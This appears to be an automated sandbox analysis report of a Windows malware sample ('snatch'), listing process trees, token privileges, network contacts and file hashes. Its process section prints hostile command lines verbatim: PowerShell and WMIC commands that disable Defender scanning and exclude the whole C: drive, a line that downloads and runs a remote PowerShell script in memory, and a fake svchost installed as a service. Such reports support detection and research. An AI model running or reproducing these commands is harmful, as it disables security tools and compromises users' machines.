N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3176 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4456 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4456 wrote to memory of 1864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 1864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 3176 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 2776 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2776 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2776 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 4544 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4544 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4544 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4688 wrote to memory of 4300 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4688 wrote to memory of 4300 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4688 wrote to memory of 4300 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 660 wrote to memory of 4360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 660 wrote to memory of 4360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 660 wrote to memory of 4360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 660 wrote to memory of 4360 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4360 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4360 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4360 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4360 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4800 wrote to memory of 720 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4800 wrote to memory of 720 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4800 wrote to memory of 3156 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Local\svchost\svchost.exe
PID 4800 wrote to memory of 3156 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Local\svchost\svchost.exe
PID 1048 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 1048 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 1048 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 1048 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\system32\wbem\wmic.exe
PID 1048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\wbem\wmic.exe
PID 1048 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\svchost\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\System32\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c install.exe

C:\Users\Admin\AppData\Local\Temp\install.exe

install.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSIA921.tmp

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7F46784FC526AC005796064DCFA2A3C7 C

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"

C:\Users\Admin\AppData\Local\svchost\svchost.exe

C:\Users\Admin\AppData\Local\svchost\svchost.exe -install

C:\Users\Admin\AppData\Local\svchost\svchost.exe

"C:\Users\Admin\AppData\Local\svchost\svchost.exe" --meshServiceName="Microsoft"

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\system32\wbem\wmic.exe

wmic os get oslanguage /FORMAT:LIST

C:\Windows\System32\wbem\wmic.exe

wmic SystemEnclosure get ChassisTypes

C:\Windows\System32\wbem\wmic.exe

wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -noprofile -nologo -command -

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.logflare.app udp
US 104.21.55.56:443 api.logflare.app tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 56.55.21.104.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 sktelecom.netlify.app udp
DE 52.58.254.253:443 sktelecom.netlify.app tcp
US 8.8.8.8:53 253.254.58.52.in-addr.arpa udp
US 8.8.8.8:53 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev udp
US 104.21.55.56:443 api.logflare.app tcp
US 162.159.140.237:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 8.8.8.8:53 237.140.159.162.in-addr.arpa udp
DE 52.58.254.253:443 sktelecom.netlify.app tcp
US 162.159.140.237:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 104.21.55.56:443 api.logflare.app tcp
US 162.159.140.237:443 pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev tcp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
US 151.101.193.229:443 cdn.jsdelivr.net tcp
US 8.8.8.8:53 229.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 133.130.101.151.in-addr.arpa udp
US 8.8.8.8:53 telegra.ph udp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
US 104.21.55.56:443 api.logflare.app tcp
NL 149.154.164.13:443 telegra.ph tcp
US 8.8.8.8:53 api.skt.cam udp
US 172.67.147.63:443 api.skt.cam tcp
US 8.8.8.8:53 microsoft.devq.workers.dev udp
US 8.8.8.8:53 13.164.154.149.in-addr.arpa udp
US 8.8.8.8:53 63.147.67.172.in-addr.arpa udp
US 104.21.61.174:443 microsoft.devq.workers.dev tcp
US 8.8.8.8:53 174.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 sktelecom.duckdns.org udp
KR 203.234.238.140:443 sktelecom.duckdns.org tcp
US 8.8.8.8:53 140.238.234.203.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kaw2vsn.qbq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3176-6-0x00000000002B0000-0x0000000003A28000-memory.dmp

memory/4456-10-0x0000017664870000-0x0000017664892000-memory.dmp

memory/4456-22-0x00007FFC4ABE3000-0x00007FFC4ABE5000-memory.dmp

memory/4456-21-0x00000176626C0000-0x00000176626D0000-memory.dmp

memory/4456-20-0x00000176626C0000-0x00000176626D0000-memory.dmp

memory/660-23-0x00000228BD800000-0x00000228BD844000-memory.dmp

memory/660-24-0x00000228BFDE0000-0x00000228BFE56000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\install.exe

MD5 979ce82b2ea35a92fae6a60c6c3e3791
SHA1 8d260eea0151ee7a6aae88eb2e9015d5efb2603b
SHA256 be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca
SHA512 ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

C:\Users\Admin\AppData\Local\Temp\MSIA921.tmp

MD5 6d9b5a3b75da266db5c237b0ac70b7f9
SHA1 9ce4aa208974b299ce0abeaf043740616f4f0b02
SHA256 d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b
SHA512 fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

C:\Users\Admin\AppData\Local\Temp\MSIAEAF.tmp

MD5 684f2d21637cb5835172edad55b6a8d9
SHA1 5eac3b8d0733aa11543248b769d7c30d2c53fcdb
SHA256 da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
SHA512 7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

memory/3176-49-0x00000000002B0000-0x0000000003A28000-memory.dmp

memory/4456-51-0x00000176626C0000-0x00000176626D0000-memory.dmp

memory/3176-52-0x00000000002B0000-0x0000000003A28000-memory.dmp

C:\Users\Admin\AppData\Local\svchost\svchost.exe

MD5 29304e42dc26d1276ca93a9c013599a4
SHA1 65437796133c2704d20757c99b768ffd915d1502
SHA256 83e75c4b57f3a255ec9efcdbda027a5b9577a993359c9a21946d5bec45924dd9
SHA512 fa0e66a941030fc9bde0b84e98645f04e3405fe76e539e214f1c1069661ca699e93d245a56fe37d4eec36fa13710bcc1b6c1373d9a0f9a0656ba233ee2aae8ca

C:\Users\Admin\AppData\Local\svchost\svchost.msh

MD5 90f91efb0b6cc632ea6b2bb3a6d5fb40
SHA1 e46a39e7252e086f34d64c3d720442cd325de506
SHA256 7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9
SHA512 f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928